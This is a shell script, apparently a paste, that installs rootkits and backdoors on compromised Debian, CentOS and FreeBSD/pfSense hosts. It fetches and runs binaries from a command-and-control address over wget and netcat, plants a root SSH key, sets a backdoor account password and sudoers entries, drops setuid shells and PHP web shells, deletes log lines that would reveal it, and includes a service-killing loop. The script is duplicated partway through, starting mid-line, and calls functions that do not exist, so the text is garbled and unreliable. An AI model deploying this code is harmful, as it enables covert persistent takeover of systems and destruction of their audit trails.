
Rooting Ubuntu, Centos, Debian, FreeBSD in seconds

  1. #!/bin/sh
  2. # cmc / sapling
  3. # installs rootkit & backdoors on debian/centos/pfsense bsd boxes
  4.  
  5. # root ssh key
  6. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"
  7.  
  8. ### CHANGE ME ###
  9. # urls for webserver where kits/backdoor binaries are hosted
  10. # file names to grab
  11.  
  12. C2_URL="http://172.25.58.142/"
  13. C2_IP="172.25.58.142"
  14.  
  15. # fedora kit
  16. FEDORA_KIT="fedx32.bin"
  17. FEDORA64_KIT="fedx64.bin"
  18. UBUNTU64_KIT="ubux64.bin"
  19. UBUNTU_KIT="ubux32.bin"
  20. BSD_KIT="hole.bin"
  21. TRIXDOOR="trixd00rd-static-ubuntu"
  22. ROOTY="rooty-release.x86"
  23. ROOTYBSD="rootybsd.x64"
  24.  
  25. #################
  26.  
  27. ARCH=`uname -i`
  28.  
  29. do_backdoors() {
  30.         echo "removing utmp.."
  31.         rm -rf /var/run/utmp
  32.         touch /var/run/utmp
  33.         chmod 664 /var/run/utmp
  34.         echo "installing root ssh key!"
  35.         chattr -i /root/.ssh/authorized*
  36.         if [ ! -d "/root/.ssh" ]; then
  37.             mkdir /root/.ssh
  38.         fi
  39.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
  40.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
  41.         # add secondary key auth file, for when they inevitably remove /root/.ssh/
  42.         echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
  43.         echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
  44.         chattr +i /root/.ssh/authorized_keys*
  45.         echo "dropping trixd00r.."
  46.         if [ ! -d "/dev/..." ]; then
  47.             mkdir /dev/...
  48.         fi
  49.         cd /dev/...
  50.         wget -q $C2_URL$TRIXDOOR -O rsyslogd
  51.         chmod +x rsyslogd
  52.         env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
  53.         echo "dropping rooty.."
  54.         wget -q $C2_URL$ROOTY -O udevd
  55.         chmod +x udevd
  56.         env PATH=$PWD /usr/bin/nohup udevd &
  57.         # uncomment below to do iptables crontab shenanigans
  58.         # echo "adding 5m disable iptables crontab.."
  59.         # echo "*/5 * * * * /sbin/iptables -F" | crontab -
  60.         echo "backdoor bin account! pass=lol123"
  61.         sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
  62.         usermod -s /bin/sh bin
  63.         echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  64.         echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  65.         echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  66.         echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  67.         groupadd admin
  68.         # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
  69.         sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
  70.         # ubuntu automatically makes members of admin have sudo capabilities.
  71.         # lets give that as an option for root to web backdoors
  72.         usermod -G admin -a bin
  73.         usermod -G admin -a www-data
  74.         usermod -G admin -a httpd
  75.         usermod -G admin -a apache
  76.         # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
  77.         sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
  78.         echo "setuid /bin/sh! for use with bin account"
  79.         if [ ! -d "/dev/  " ]; then
  80.             mkdir "/dev/  "
  81.         fi
  82.         cp /bin/sh "/dev/  /pwnd"
  83.         chmod 777 "/dev/  /pwnd"
  84.         chown root:root "/dev/  /pwnd"
  85.         chmod u+s "/dev/  /pwnd"
  86.         echo "clearing log entries with our IP.."
  87.         sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
  88.         sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
  89.         sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
  90.         sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
  91.         echo "dropping webshells.."
  92.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  93.         chmod 777 /var/www/.src.php
  94.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  95.         chmod 777 /var/www/html/.src.php
  96. }
  97.  
  98. do_bsdbackdoors() {
  99.         # this was a quick hack for the pfsense firewalls
  100.         # uses netcat vs wget because wget isnt installed on pfsense
  101.         # by default
  102.         echo "installing root ssh key!"
  103.         if [ ! -d "/root/.ssh" ]; then
  104.             mkdir /root/.ssh
  105.         fi
  106.         echo $PUBKEY >> /root/.ssh/authorized_keys2
  107.         echo $PUBKEY >> /root/.ssh/authorized_keys
  108.         chattr +i /root/.ssh/authorized_keys*
  109.         echo "dropping rooty via netcat.."
  110.         # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
  111.         if [ ! -d "/dev/  " ]; then
  112.             mkdir "/dev/  "
  113.         fi
  114.         cd "/dev/  "
  115.         nc $C2_IP 1338 > udevd
  116.         chmod +x udevd
  117.         env PATH=$PWD /usr/bin/nohup udevd &
  118.         echo "dropping webshells.."
  119.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  120.         chmod 777 /var/www/.src.php
  121.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  122.         chmod 777 /var/www/html/.src.php
  123. }
  124.  
  125.  
  126. do_centos_rootkit() {
  127.     echo "Retrieving Fedora x86 kit..."
  128.         if [ ! -d "/dev/..." ]; then
  129.             mkdir /dev/...
  130.         fi
  131.     cd /dev/...
  132.     wget -q $C2_URL$FEDORA_KIT
  133.     chmod +x `basename $FEDORA_KIT`
  134.     ./`basename $FEDORA_KIT`
  135. }
  136.  
  137. do_centos64_rootkit() {
  138.     echo "Retrieving Fedora x64 kit..."
  139.         if [ ! -d "/dev/..." ]; then
  140.             mkdir /dev/...
  141.         fi
  142.     cd /dev/...
  143.     wget -q $C2_URL$FEDORA64_KIT
  144.     chmod +x `basename $FEDORA64_KIT`
  145.     ./`basename $FEDORA64_KIT`
  146. }
  147.  
  148.  
  149. do_freebsd64_rootkit() {
  150.     echo "Installing BSD hole.bin.."
  151.     cd /opt/
  152.     # cmc: pfSense / BSD has no wget/curl
  153.     # make sure we have a listening netcat#!/bin/sh
  154. # cmc / sapling
  155. # installs rootkit & backdoors on debian/centos/pfsense bsd boxes
  156.  
  157. # root ssh key
  158. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"
  159.  
  160. ### CHANGE ME ###
  161. # urls for webserver where kits/backdoor binaries are hosted
  162. # file names to grab
  163.  
  164. C2_URL="http://172.25.58.142/"
  165. C2_IP="172.25.58.142"
  166.  
  167. # fedora kit
  168. FEDORA_KIT="fedx32.bin"
  169. FEDORA64_KIT="fedx64.bin"
  170. UBUNTU64_KIT="ubux64.bin"
  171. UBUNTU_KIT="ubux32.bin"
  172. BSD_KIT="hole.bin"
  173. TRIXDOOR="trixd00rd-static-ubuntu"
  174. ROOTY="rooty-release.x86"
  175. ROOTYBSD="rootybsd.x64"
  176.  
  177. #################
  178.  
  179. ARCH=`uname -i`
  180.  
  181. do_backdoors() {
  182.         echo "removing utmp.."
  183.         rm -rf /var/run/utmp
  184.         touch /var/run/utmp
  185.         chmod 664 /var/run/utmp
  186.         echo "installing root ssh key!"
  187.         chattr -i /root/.ssh/authorized*
  188.         if [ ! -d "/root/.ssh" ]; then
  189.             mkdir /root/.ssh
  190.         fi
  191.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
  192.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
  193.         # add secondary key auth file, for when they inevitably remove /root/.ssh/
  194.         echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
  195.         echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
  196.         chattr +i /root/.ssh/authorized_keys*
  197.         echo "dropping trixd00r.."
  198.         if [ ! -d "/dev/..." ]; then
  199.             mkdir /dev/...
  200.         fi
  201.         cd /dev/...
  202.         wget -q $C2_URL$TRIXDOOR -O rsyslogd
  203.         chmod +x rsyslogd
  204.         env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
  205.         echo "dropping rooty.."
  206.         wget -q $C2_URL$ROOTY -O udevd
  207.         chmod +x udevd
  208.         env PATH=$PWD /usr/bin/nohup udevd &
  209.         # uncomment below to do iptables crontab shenanigans
  210.         # echo "adding 5m disable iptables crontab.."
  211.         # echo "*/5 * * * * /sbin/iptables -F" | crontab -
  212.         echo "backdoor bin account! pass=lol123"
  213.         sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
  214.         usermod -s /bin/sh bin
  215.         echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  216.         echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  217.         echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  218.         echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  219.         groupadd admin
  220.         # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
  221.         sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
  222.         # ubuntu automatically makes members of admin have sudo capabilities.
  223.         # lets give that as an option for root to web backdoors
  224.         usermod -G admin -a bin
  225.         usermod -G admin -a www-data
  226.         usermod -G admin -a httpd
  227.         usermod -G admin -a apache
  228.         # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
  229.         sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
  230.         echo "setuid /bin/sh! for use with bin account"
  231.         if [ ! -d "/dev/  " ]; then
  232.             mkdir "/dev/  "
  233.         fi
  234.         cp /bin/sh "/dev/  /pwnd"
  235.         chmod 777 "/dev/  /pwnd"
  236.         chown root:root "/dev/  /pwnd"
  237.         chmod u+s "/dev/  /pwnd"
  238.         echo "clearing log entries with our IP.."
  239.         sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
  240.         sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
  241.         sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
  242.         sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
  243.         echo "dropping webshells.."
  244.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  245.         chmod 777 /var/www/.src.php
  246.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  247.         chmod 777 /var/www/html/.src.php
  248. }
  249.  
  250. do_bsdbackdoors() {
  251.         # this was a quick hack for the pfsense firewalls
  252.         # uses netcat vs wget because wget isnt installed on pfsense
  253.         # by default
  254.         echo "installing root ssh key!"
  255.         if [ ! -d "/root/.ssh" ]; then
  256.             mkdir /root/.ssh
  257.         fi
  258.         echo $PUBKEY >> /root/.ssh/authorized_keys2
  259.         echo $PUBKEY >> /root/.ssh/authorized_keys
  260.         chattr +i /root/.ssh/authorized_keys*
  261.         echo "dropping rooty via netcat.."
  262.         # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
  263.         if [ ! -d "/dev/  " ]; then
  264.             mkdir "/dev/  "
  265.         fi
  266.         cd "/dev/  "
  267.         nc $C2_IP 1338 > udevd
  268.         chmod +x udevd
  269.         env PATH=$PWD /usr/bin/nohup udevd &
  270.         echo "dropping webshells.."
  271.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  272.         chmod 777 /var/www/.src.php
  273.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  274.         chmod 777 /var/www/html/.src.php
  275. }
  276.  
  277.  
  278. do_centos_rootkit() {
  279.     echo "Retrieving Fedora x86 kit..."
  280.         if [ ! -d "/dev/..." ]; then
  281.             mkdir /dev/...
  282.         fi
  283.     cd /dev/...
  284.     wget -q $C2_URL$FEDORA_KIT
  285.     chmod +x `basename $FEDORA_KIT`
  286.     ./`basename $FEDORA_KIT`
  287. }
  288.  
  289. do_centos64_rootkit() {
  290.     echo "Retrieving Fedora x64 kit..."
  291.         if [ ! -d "/dev/..." ]; then
  292.             mkdir /dev/...
  293.         fi
  294.     cd /dev/...
  295.     wget -q $C2_URL$FEDORA64_KIT
  296.     chmod +x `basename $FEDORA64_KIT`
  297.     ./`basename $FEDORA64_KIT`
  298. }
  299.  
  300.  
  301. do_freebsd64_rootkit() {
  302.     echo "Installing BSD hole.bin.."
  303.     cd /opt/
  304.     # cmc: pfSense / BSD has no wget/curl
  305.     # make sure we have a listening netcat
  306.     # cat backdoor.bin | nc -v -l 13337
  307.     nc $C2_URL 1337 > /opt/scorebotd
  308.     # chmod 0755 `basename $BSD_KIT`
  309.     # mv `basename $BSD_KIT` /opt/scorebotd
  310.     chmod +x /opt/scorebotd
  311.     nohup /opt/scorebotd &
  312. }
  313. do_ubuntu_rootkit() {
  314.     echo "Retrieving ubuntu x86 kit..."
  315.         if [ ! -d "/dev/..." ]; then
  316.             mkdir /dev/...
  317.         fi
  318.     cd /dev/...
  319.     wget -q $C2_URL$UBUNTU_KIT
  320.     chmod +x `basename $UBUNTU_KIT`
  321.     ./`basename $UBUNTU_KIT`
  322. }
  323.  
  324.  
  325. do_ubuntu64_rootkit() {
  326. echo "Retrieving ubuntu x64 kit..."
  327.     if [ ! -d "/dev/..." ]; then
  328.             mkdir /dev/...
  329.     fi
  330.     cd /dev/...
  331.     wget -q $C2_URL$UBUNTU64_KIT
  332.     chmod +x `basename $UBUNTU64_KIT`
  333.     ./`basename $UBUNTU64_KIT`
  334. }
  335.  
  336. goodbye_sla() {
  337.     cat <<EOF > /usr/share/service.sh
  338. #!/bin/bash
  339. #UMAD?
  340. while [ 0 ]
  341. do
  342.     service httpd stop
  343.     service postfix stop
  344.     service sendmail stop
  345.     service mysql stop
  346.     service webmin stop
  347.         service named stop
  348.         service bind stop
  349.     killall -9 webmin.pl
  350.     killall -9 apache2
  351.         killall -9 httpd
  352.         killall -9 named
  353.     killall -9 mysqld_safe
  354.     killall -9 mysqld
  355.         sleep 10
  356. done
  357. EOF
  358. chmod +x /usr/share/service.sh
  359. nohup /usr/share/service.sh >/dev/null 2>&1 &
  360. }
  361.  
  362. # 64bit fedora
  363. if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  364.     do_centos64_rootkit
  365.     do_backdoors
  366. fi
  367.  
  368. # 32bit fedora
  369. if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  370.     do_centos_rootkit
  371.     do_backdoors
  372.         #goodbye_sla
  373. fi
  374.  
  375.  
  376. # ubuntu/debian 64bit
  377. if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
  378.     do_ubuntu64_rootkit
  379.     do_backdoors
  380.     #goodbye_sla
  381. fi
  382.  
  383. # ubuntu/debian 32bit (assumed if not 64, whatever)
  384. if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
  385.     do_ubuntu32_rootkit
  386.     do_backdoors
  387.     #goodbye_sla
  388. fi
  389.  
  390.  
  391. # freebsd
  392. if [ `uname`  = 'FreeBSD' ]; then
  393.     do_freebsd64_kit
  394.     do_bsdbackdoors    
  395. fi
  396.     # cat backdoor.bin | nc -v -l 13337
  397.     nc $C2_URL 1337 > /opt/scorebotd
  398.     # chmod 0755 `basename $BSD_KIT`
  399.     # mv `basename $BSD_KIT` /opt/scorebotd
  400.     chmod +x /opt/scorebotd
  401.     nohup /opt/scorebotd &
  402. }
  403. do_ubuntu_rootkit() {
  404.     echo "Retrieving ubuntu x86 kit..."
  405.         if [ ! -d "/dev/..." ]; then
  406.             mkdir /dev/...
  407.         fi
  408.     cd /dev/...
  409.     wget -q $C2_URL$UBUNTU_KIT
  410.     chmod +x `basename $UBUNTU_KIT`
  411.     ./`basename $UBUNTU_KIT`
  412. }
  413.  
  414.  
  415. do_ubuntu64_rootkit() {
  416. echo "Retrieving ubuntu x64 kit..."
  417.     if [ ! -d "/dev/..." ]; then
  418.             mkdir /dev/...
  419.     fi
  420.     cd /dev/...
  421.     wget -q $C2_URL$UBUNTU64_KIT
  422.     chmod +x `basename $UBUNTU64_KIT`
  423.     ./`basename $UBUNTU64_KIT`
  424. }
  425.  
  426. goodbye_sla() {
  427.     cat <<EOF > /usr/share/service.sh
  428. #!/bin/bash
  429. #UMAD?
  430. while [ 0 ]
  431. do
  432.     service httpd stop
  433.     service postfix stop
  434.     service sendmail stop
  435.     service mysql stop
  436.     service webmin stop
  437.         service named stop
  438.         service bind stop
  439.     killall -9 webmin.pl
  440.     killall -9 apache2
  441.         killall -9 httpd
  442.         killall -9 named
  443.     killall -9 mysqld_safe
  444.     killall -9 mysqld
  445.         sleep 10
  446. done
  447. EOF
  448. chmod +x /usr/share/service.sh
  449. nohup /usr/share/service.sh >/dev/null 2>&1 &
  450. }
  451.  
  452. # 64bit fedora
  453. if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  454.     do_centos64_rootkit
  455.     do_backdoors
  456. fi
  457.  
  458. # 32bit fedora
  459. if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  460.     do_centos_rootkit
  461.     do_backdoors
  462.         #goodbye_sla
  463. fi
  464.  
  465.  
  466. # ubuntu/debian 64bit
  467. if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
  468.     do_ubuntu64_rootkit
  469.     do_backdoors
  470.     #goodbye_sla
  471. fi
  472.  
  473. # ubuntu/debian 32bit (assumed if not 64, whatever)
  474. if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
  475.     do_ubuntu32_rootkit
  476.     do_backdoors
  477.     #goodbye_sla
  478. fi
  479.  
  480.  
  481. # freebsd
  482. if [ `uname`  = 'FreeBSD' ]; then
  483.     do_freebsd64_kit
  484.     do_bsdbackdoors    
  485. fi